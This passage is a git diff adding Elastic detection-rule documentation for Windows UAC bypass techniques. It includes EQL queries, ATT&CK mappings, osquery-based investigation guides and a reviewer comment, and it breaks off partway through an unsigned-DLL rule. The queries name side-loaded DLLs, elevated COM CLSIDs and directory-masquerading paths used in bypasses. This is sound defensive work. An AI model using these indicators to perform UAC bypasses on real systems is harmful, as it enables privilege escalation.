Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc new file mode 100644 index 0000000000..6db258345c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc 
@@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface]] +=== UAC Bypass Attempt via Privileged IFileOperation COM Interface + +Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/UACME +* https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type : "change" and process.name : "dllhost.exe" and + /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */ + file.name : ("wow64log.dll", "comctl32.dll", "DismCore.dll", "OskSupport.dll", "duser.dll", "Accessibility.ni.dll") and + /* has no impact on rule logic just to avoid OS install related FPs */ + not file.path : ("C:\\Windows\\SoftwareDistribution\\*", "C:\\Windows\\WinSxS\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation 
+** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc new file mode 100644 index 0000000000..dd5e7bf2f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc 
@@ -0,0 +1,151 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading]] +=== UAC Bypass Attempt via Windows Directory Masquerading + +Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating UAC Bypass Attempt via Windows Directory Masquerading + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). 
+ +This rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze any suspicious spawned processes using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.args : ("C:\\Windows \\system32\\*.exe", "C:\\Windows \\SysWOW64\\*.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: 
https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc new file mode 100644 index 0000000000..a7ded8560c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc 
@@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface]] +=== UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface + +Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/UACME + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.name : "Clipup.exe" and + not process.executable : "C:\\Windows\\System32\\ClipUp.exe" and process.parent.name : "dllhost.exe" and + /* CLSID of the Elevated COM Interface IEditionUpgradeManager */ + process.parent.args : "/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: 
https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc new file mode 100644 index 0000000000..0735dcc992 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc 
@@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack]] +=== UAC Bypass via DiskCleanup Scheduled Task Hijack + +Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.args : "/autoclean" and process.args : "/d" and + not process.executable : ("C:\\Windows\\System32\\cleanmgr.exe", + "C:\\Windows\\SysWOW64\\cleanmgr.exe", + "C:\\Windows\\System32\\taskhostw.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: 
TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc new file mode 100644 index 0000000000..a39edd726b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc 
@@ -0,0 +1,104 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface]] +=== UAC Bypass via ICMLuaUtil Elevated COM Interface + +Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name == "dllhost.exe" and + process.parent.args in ("/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and + process.pe.original_file_name != "WerFault.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* 
Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc new file mode 100644 index 0000000000..48be2db6ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc 
@@ -0,0 +1,154 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack]] +=== UAC Bypass via Windows Firewall Snap-In Hijack + +Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/AzAgarampur/byeintegrity-uac + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating UAC Bypass via Windows Firewall Snap-In Hijack + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). 
+ +This rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze any suspicious spawned processes using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name == "mmc.exe" and + /* process.Ext.token.integrity_level_name == "high" can be added in future for tuning */ + /* args of the Windows Firewall SnapIn */ + process.parent.args == "WF.msc" and process.name != "WerFault.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: 
https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc new file mode 100644 index 0000000000..adf701a2cf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc 
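Review bot: the last "Possible investigation steps" bullet, "searching for login events (for example, 4624) to the target host after the registry modification", refers to a registry modification this rule does not observe: the query is a process start rule keyed on `process.parent.name == "mmc.exe"` and `process.parent.args == "WF.msc"`. The sentence reads as carried over from a registry-based guide; suggest "after the alerted process start". Separately, the query comment `/* process.Ext.token.integrity_level_name == "high" can be added in future for tuning */` is the one concrete tuning hint in the file, but the False positive analysis section ("This activity is unlikely to happen legitimately") does not mention it; surfacing it there would help analysts who need to add exceptions.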
@@ -0,0 +1,179 @@ +[[prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost]] +=== Unsigned DLL Loaded by Svchost + +Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and + + process.executable : + ("?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\Syswow64\\svchost.exe") and + + dll.code_signature.trusted != true and + + not dll.code_signature.status : ("trusted", "errorExpired", "errorCode_endpoint*") and + + dll.hash.sha256 != null and + + ( + /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */ + dll.Ext.relative_file_creation_time <= 300 or + + /* unusual paths */ + dll.path :("?:\\ProgramData\\*", + "?:\\Users\\*", + "?:\\PerfLogs\\*", + "?:\\Windows\\Tasks\\*", + "?:\\Intel\\*", + "?:\\AMD\\Temp\\*", + "?:\\Windows\\AppReadiness\\*", + "?:\\Windows\\ServiceState\\*", + "?:\\Windows\\security\\*", + "?:\\Windows\\IdentityCRL\\*", + "?:\\Windows\\Branding\\*", + "?:\\Windows\\csc\\*", + "?:\\Windows\\DigitalLocker\\*", + "?:\\Windows\\en-US\\*", + "?:\\Windows\\wlansvc\\*", + "?:\\Windows\\Prefetch\\*", + "?:\\Windows\\Fonts\\*", + 
